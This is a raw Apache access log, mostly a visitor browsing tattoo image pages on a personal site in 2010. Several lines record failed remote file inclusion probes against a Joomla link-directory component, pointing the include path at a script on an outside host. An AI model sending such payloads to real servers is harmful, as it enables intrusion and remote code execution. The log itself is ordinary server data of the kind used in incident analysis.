206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:19:39 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
88.191.94.188 - - [09/Apr/2010:07:19:53 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:19:53 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:19:53 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:19:55 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:19:55 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:07:19:55 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
206.195.19.42 - - [09/Apr/2010:07:20:34 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
206.195.19.42 - - [09/Apr/2010:07:20:34 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
